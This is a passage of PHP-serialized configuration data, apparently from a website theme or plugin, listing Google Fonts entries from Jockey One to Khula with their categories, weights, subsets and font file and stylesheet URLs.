One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/jockeyone/v6/cAucnOZLvFo07w2AbufBCfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Jockey+One:regular";}}s:12:"jolly_lodger";a:7:{s:4:"name";s:12:"Jolly Lodger";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/jollylodger/v4/RX8HnkBgaEKQSHQyP9itiS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Jolly+Lodger:regular";}}s:8:"jomhuria";a:7:{s:4:"name";s:8:"Jomhuria";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/jomhuria/v2/hrvsccQpBliIgor15WxE6g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Jomhuria:regular";}}s:12:"josefin_sans";a:7:{s:4:"name";s:12:"Josefin Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:10:{i:100;s:89:"http://fonts.gstatic.com/s/josefinsans/v9/q9w3H4aeBxj0hZ8Osfi3d8SVQ0giZ-l_NELu3lgGyYw.ttf";s:9:"100italic";s:89:"http://fonts.gstatic.com/s/josefinsans/v9/s7-P1gqRNRNn-YWdOYnAOXXcj1rQwlNLIS625o-SrL0.ttf";i:300;s:89:"http://fonts.gstatic.com/s/josefinsans/v9/C6HYlRF50SGJq1XyXj04z6cQoVhARpoaILP7amxE_8g.ttf";s:9:"300italic";s:89:"http://fonts.gstatic.com/s/josefinsans/v9/ppse0J9fKSaoxCIIJb33Gyna0FLWfcB-J_SAYmcAXaI.ttf";s:7:"regular";s:89:"http://fonts.gstatic.com/s/josefinsans/v9/xgzbb53t8j-Mo-vYa23n5i3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/josefinsans/v9/q9w3H4aeBxj0hZ8Osfi3d_MZXuCXbOrAvx5R0IT5Oyo.ttf";i:600;s:89:"http://fonts.gstatic.com/s/josefinsans/v9/C6HYlRF50SGJq1XyXj04z2v8CylhIUtwUiYO7Z2wXbE.ttf";s:9:"600italic";s:89:"http://fonts.gstatic.com/s/josefinsans/v9/ppse0J9fKSaoxCIIJb33G4R-5-urNOGAobhAyctHvW8.ttf";i:700;s:89:"http://fonts.gstatic.com/s/josefinsans/v9/C6HYlRF50SGJq1XyXj04z0D2ttfZwueP-QU272T9-k4.ttf";s:9:"700italic";s:89:"http://fonts.gstatic.com/s/josefinsans/v9/ppse0J9fKSaoxCIIJb33G_As9-1nE9qOqhChW0m4nDE.ttf";}s:4:"urls";a:10:{i:100;s:56:"https://fonts.googleapis.com/css?family=Josefin+Sans:100";s:9:"100italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Sans:100italic";i:300;s:56:"https://fonts.googleapis.com/css?family=Josefin+Sans:300";s:9:"300italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Sans:300italic";s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Josefin+Sans:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Josefin+Sans:italic";i:600;s:56:"https://fonts.googleapis.com/css?family=Josefin+Sans:600";s:9:"600italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Sans:600italic";i:700;s:56:"https://fonts.googleapis.com/css?family=Josefin+Sans:700";s:9:"700italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Sans:700italic";}}s:12:"josefin_slab";a:7:{s:4:"name";s:12:"Josefin Slab";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:10:{i:100;s:89:"http://fonts.gstatic.com/s/josefinslab/v6/etsUjZYO8lTLU85lDhZwUsSVQ0giZ-l_NELu3lgGyYw.ttf";s:9:"100italic";s:89:"http://fonts.gstatic.com/s/josefinslab/v6/8BjDChqLgBF3RJKfwHIYh3Xcj1rQwlNLIS625o-SrL0.ttf";i:300;s:89:"http://fonts.gstatic.com/s/josefinslab/v6/NbE6ykYuM2IyEwxQxOIi2KcQoVhARpoaILP7amxE_8g.ttf";s:9:"300italic";s:89:"http://fonts.gstatic.com/s/josefinslab/v6/af9sBoKGPbGO0r21xJulyyna0FLWfcB-J_SAYmcAXaI.ttf";s:7:"regular";s:89:"http://fonts.gstatic.com/s/josefinslab/v6/46aYWdgz-1oFX11flmyEfS3USBnSvpkopQaUR-2r7iU.ttf";s:6:"italic";s:89:"http://fonts.gstatic.com/s/josefinslab/v6/etsUjZYO8lTLU85lDhZwUvMZXuCXbOrAvx5R0IT5Oyo.ttf";i:600;s:89:"http://fonts.gstatic.com/s/josefinslab/v6/NbE6ykYuM2IyEwxQxOIi2Gv8CylhIUtwUiYO7Z2wXbE.ttf";s:9:"600italic";s:89:"http://fonts.gstatic.com/s/josefinslab/v6/af9sBoKGPbGO0r21xJuly4R-5-urNOGAobhAyctHvW8.ttf";i:700;s:89:"http://fonts.gstatic.com/s/josefinslab/v6/NbE6ykYuM2IyEwxQxOIi2ED2ttfZwueP-QU272T9-k4.ttf";s:9:"700italic";s:89:"http://fonts.gstatic.com/s/josefinslab/v6/af9sBoKGPbGO0r21xJuly_As9-1nE9qOqhChW0m4nDE.ttf";}s:4:"urls";a:10:{i:100;s:56:"https://fonts.googleapis.com/css?family=Josefin+Slab:100";s:9:"100italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Slab:100italic";i:300;s:56:"https://fonts.googleapis.com/css?family=Josefin+Slab:300";s:9:"300italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Slab:300italic";s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Josefin+Slab:regular";s:6:"italic";s:59:"https://fonts.googleapis.com/css?family=Josefin+Slab:italic";i:600;s:56:"https://fonts.googleapis.com/css?family=Josefin+Slab:600";s:9:"600italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Slab:600italic";i:700;s:56:"https://fonts.googleapis.com/css?family=Josefin+Slab:700";s:9:"700italic";s:62:"https://fonts.googleapis.com/css?family=Josefin+Slab:700italic";}}s:8:"joti_one";a:7:{s:4:"name";s:8:"Joti One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/jotione/v4/P3r_Th0ESHJdzunsvWgUfQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Joti+One:regular";}}s:6:"judson";a:7:{s:4:"name";s:6:"Judson";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/judson/v9/znM1AAs0eytUaJzf1CrYZQ.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/judson/v9/GVqQW9P52ygW-ySq-CLwAA.ttf";i:700;s:63:"http://fonts.gstatic.com/s/judson/v9/he4a2LwiPJc7r8x0oKCKiA.ttf";}s:4:"urls";a:3:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Judson:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Judson:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Judson:700";}}s:5:"julee";a:7:{s:4:"name";s:5:"Julee";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/julee/v6/CAib-jsUsSO8SvVRnE9fHA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Julee:regular";}}s:15:"julius_sans_one";a:7:{s:4:"name";s:15:"Julius Sans One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/juliussansone/v5/iU65JP9acQHPDLkdalCF7jjVlsJB_M_Q_LtZxsoxvlw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Julius+Sans+One:regular";}}s:5:"junge";a:7:{s:4:"name";s:5:"Junge";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/junge/v4/j4IXCXtxrw9qIBheercp3A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Junge:regular";}}s:4:"jura";a:7:{s:4:"name";s:4:"Jura";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";}s:7:"subsets";a:5:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:12:"cyrillic-ext";i:3;s:9:"latin-ext";i:4;s:8:"cyrillic";}s:5:"files";a:4:{i:300;s:61:"http://fonts.gstatic.com/s/jura/v7/Rqx_xy1UnN0C7wD3FUSyPQ.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/jura/v7/YAWMwF3sN0KCbynMq-Yr_Q.ttf";i:500;s:61:"http://fonts.gstatic.com/s/jura/v7/16xhfjHCiaLj3tsqqgmtGg.ttf";i:600;s:61:"http://fonts.gstatic.com/s/jura/v7/iwseduOwJSdY8wQ1Y6CJdA.ttf";}s:4:"urls";a:4:{i:300;s:48:"https://fonts.googleapis.com/css?family=Jura:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Jura:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Jura:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Jura:600";}}s:17:"just_another_hand";a:7:{s:4:"name";s:17:"Just Another Hand";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/justanotherhand/v7/fKV8XYuRNNagXr38eqbRf99BnJIEGrvoojniP57E51c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Just+Another+Hand:regular";}}s:23:"just_me_again_down_here";a:7:{s:4:"name";s:23:"Just Me Again Down Here";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/justmeagaindownhere/v8/sN06iTc9ITubLTgXoG-kc3M9eVLpVTSK6TqZTIgBrWQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:71:"https://fonts.googleapis.com/css?family=Just+Me+Again+Down+Here:regular";}}s:5:"kadwa";a:7:{s:4:"name";s:5:"Kadwa";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/kadwa/v1/VwEN8oKGqaa0ug9kRpvSSg.ttf";i:700;s:62:"http://fonts.gstatic.com/s/kadwa/v1/NFPZaBfekj_Io-7vUMz4Ww.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Kadwa:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Kadwa:700";}}s:5:"kalam";a:7:{s:4:"name";s:5:"Kalam";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:3:{i:300;s:62:"http://fonts.gstatic.com/s/kalam/v7/MgQQlk1SgPEHdlkWMNh7Jg.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/kalam/v7/hNEJkp2K-aql7e5WQish4Q.ttf";i:700;s:62:"http://fonts.gstatic.com/s/kalam/v7/95nLItUGyWtNLZjSckluLQ.ttf";}s:4:"urls";a:3:{i:300;s:49:"https://fonts.googleapis.com/css?family=Kalam:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Kalam:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Kalam:700";}}s:7:"kameron";a:7:{s:4:"name";s:7:"Kameron";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/kameron/v7/9r8HYhqDSwcq9WMjupL82A.ttf";i:700;s:85:"http://fonts.gstatic.com/s/kameron/v7/rabVVbzlflqvmXJUFlKnu_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Kameron:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Kameron:700";}}s:5:"kanit";a:7:{s:4:"name";s:5:"Kanit";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:62:"http://fonts.gstatic.com/s/kanit/v1/CYl4qOK-NWwZp3iTKW1eIA.ttf";s:9:"100italic";s:62:"http://fonts.gstatic.com/s/kanit/v1/NLNtc56MpXmHl1yOrop8oQ.ttf";i:200;s:62:"http://fonts.gstatic.com/s/kanit/v1/wfLWkj1C4tYl7MoiFWS3bA.ttf";s:9:"200italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/D8gkrAAM2bvNJ-1i4ot-1_esZW2xOQ-xsNqO47m55DA.ttf";i:300;s:62:"http://fonts.gstatic.com/s/kanit/v1/SM5qHynYGdOmMKEwGUFIPA.ttf";s:9:"300italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/IePislKOKy3Bqfpb9V5VM_esZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/kanit/v1/L6VKvM17ZmevDynOiw7H9w.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/kanit/v1/sHLq5U0-T0oSMTnwTKgv-A.ttf";i:500;s:62:"http://fonts.gstatic.com/s/kanit/v1/GxoU_USIJyIy8WIcYSUO2g.ttf";s:9:"500italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/hrCiWCaNv9AaF0mDY1F2zPesZW2xOQ-xsNqO47m55DA.ttf";i:600;s:62:"http://fonts.gstatic.com/s/kanit/v1/n_qoIVxojeQY0D1pvoNDhA.ttf";s:9:"600italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/9BkP85yRDoVayTWQwdGLqPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/kanit/v1/kEGmYvO8My36j5ILmbUPRg.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/WNo3ZZ9xtOZJknNlvHAFWfesZW2xOQ-xsNqO47m55DA.ttf";i:800;s:62:"http://fonts.gstatic.com/s/kanit/v1/YTp-zAuKXxwnA1YnJIF1rg.ttf";s:9:"800italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/qiTGrW5sCa9UQp841fWjc_esZW2xOQ-xsNqO47m55DA.ttf";i:900;s:62:"http://fonts.gstatic.com/s/kanit/v1/1NIEkusi3bG3GgO9Hor3fQ.ttf";s:9:"900italic";s:83:"http://fonts.gstatic.com/s/kanit/v1/ogN5dFD1r4BfxNV4Nb-TXfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:18:{i:100;s:49:"https://fonts.googleapis.com/css?family=Kanit:100";s:9:"100italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:100italic";i:200;s:49:"https://fonts.googleapis.com/css?family=Kanit:200";s:9:"200italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:200italic";i:300;s:49:"https://fonts.googleapis.com/css?family=Kanit:300";s:9:"300italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:300italic";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Kanit:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Kanit:italic";i:500;s:49:"https://fonts.googleapis.com/css?family=Kanit:500";s:9:"500italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:500italic";i:600;s:49:"https://fonts.googleapis.com/css?family=Kanit:600";s:9:"600italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:600italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Kanit:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:700italic";i:800;s:49:"https://fonts.googleapis.com/css?family=Kanit:800";s:9:"800italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:800italic";i:900;s:49:"https://fonts.googleapis.com/css?family=Kanit:900";s:9:"900italic";s:55:"https://fonts.googleapis.com/css?family=Kanit:900italic";}}s:9:"kantumruy";a:7:{s:4:"name";s:9:"Kantumruy";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:3:{i:300;s:87:"http://fonts.gstatic.com/s/kantumruy/v3/ERRwQE0WG5uanaZWmOFXNi3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:66:"http://fonts.gstatic.com/s/kantumruy/v3/kQfXNYElQxr5dS8FyjD39Q.ttf";i:700;s:87:"http://fonts.gstatic.com/s/kantumruy/v3/gie_zErpGf_rNzs920C2Ji3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:3:{i:300;s:53:"https://fonts.googleapis.com/css?family=Kantumruy:300";s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Kantumruy:regular";i:700;s:53:"https://fonts.googleapis.com/css?family=Kantumruy:700";}}s:5:"karla";a:7:{s:4:"name";s:5:"Karla";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/karla/v5/78UgGRwJFkhqaoFimqoKpQ.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/karla/v5/51UBKly9RQOnOkj95ZwEFw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/karla/v5/JS501sZLxZ4zraLQdncOUA.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/karla/v5/3YDyi09gQjCRh-5-SVhTTvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Karla:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Karla:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Karla:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Karla:700italic";}}s:5:"karma";a:7:{s:4:"name";s:5:"Karma";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:62:"http://fonts.gstatic.com/s/karma/v5/lH6ijJnguWR2Sz7tEl6MQQ.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/karma/v5/wvqTxAGBUrTqU0urTEoPIw.ttf";i:500;s:62:"http://fonts.gstatic.com/s/karma/v5/9YGjxi6Hcvz2Kh-rzO_cAw.ttf";i:600;s:62:"http://fonts.gstatic.com/s/karma/v5/h_CVzXXtqSxjfS2sIwaejA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/karma/v5/smuSM08oApsQPPVYbHd1CA.ttf";}s:4:"urls";a:5:{i:300;s:49:"https://fonts.googleapis.com/css?family=Karma:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Karma:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Karma:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Karma:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Karma:700";}}s:7:"katibeh";a:7:{s:4:"name";s:7:"Katibeh";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/katibeh/v2/Q-SA43uWR2uu3wBIvedotA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Katibeh:regular";}}s:14:"kaushan_script";a:7:{s:4:"name";s:14:"Kaushan Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/kaushanscript/v5/qx1LSqts-NtiKcLw4N03IBnpV0hQCek3EmWnCPrvGRM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Kaushan+Script:regular";}}s:9:"kavivanar";a:7:{s:4:"name";s:9:"Kavivanar";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/kavivanar/v1/VLDrdUtF1irKFc8rFWgDaw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Kavivanar:regular";}}s:6:"kavoon";a:7:{s:4:"name";s:6:"Kavoon";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/kavoon/v5/382m-6baKXqJFQjEgobt6Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Kavoon:regular";}}s:10:"kdam_thmor";a:7:{s:4:"name";s:10:"Kdam Thmor";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/kdamthmor/v3/otCdP6UU-VBIrBfVDWBQJ_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Kdam+Thmor:regular";}}s:10:"keania_one";a:7:{s:4:"name";s:10:"Keania One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/keaniaone/v4/PACrDKZWngXzgo-ucl6buvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Keania+One:regular";}}s:10:"kelly_slab";a:7:{s:4:"name";s:10:"Kelly Slab";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/kellyslab/v6/F_2oS1e9XdYx1MAi8XEVefesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Kelly+Slab:regular";}}s:5:"kenia";a:7:{s:4:"name";s:5:"Kenia";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/kenia/v8/OLM9-XfITK9PsTLKbGBrwg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Kenia:regular";}}s:5:"khand";a:7:{s:4:"name";s:5:"Khand";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:62:"http://fonts.gstatic.com/s/khand/v4/072zRl4OU9Pinjjkg174LA.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/khand/v4/HdLdTNFqNIDGJZl1ZEj84w.ttf";i:500;s:62:"http://fonts.gstatic.com/s/khand/v4/46_p-SqtuMe56nxQdteWxg.ttf";i:600;s:62:"http://fonts.gstatic.com/s/khand/v4/zggGWYIiPJyMTgkfxP_kaA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/khand/v4/0I0UWaN-X5QBmfexpXKhqg.ttf";}s:4:"urls";a:5:{i:300;s:49:"https://fonts.googleapis.com/css?family=Khand:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Khand:regular";i:500;s:49:"https://fonts.googleapis.com/css?family=Khand:500";i:600;s:49:"https://fonts.googleapis.com/css?family=Khand:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Khand:700";}}s:5:"khmer";a:7:{s:4:"name";s:5:"Khmer";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/khmer/v9/vWaBJIbaQuBNz02ALIKJ3A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Khmer:regular";}}s:5:"khula";a:7:{s:4:"name";s:5:"Khula";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"600";i:3;s:3:"700";i:4;s:3:"800";}s: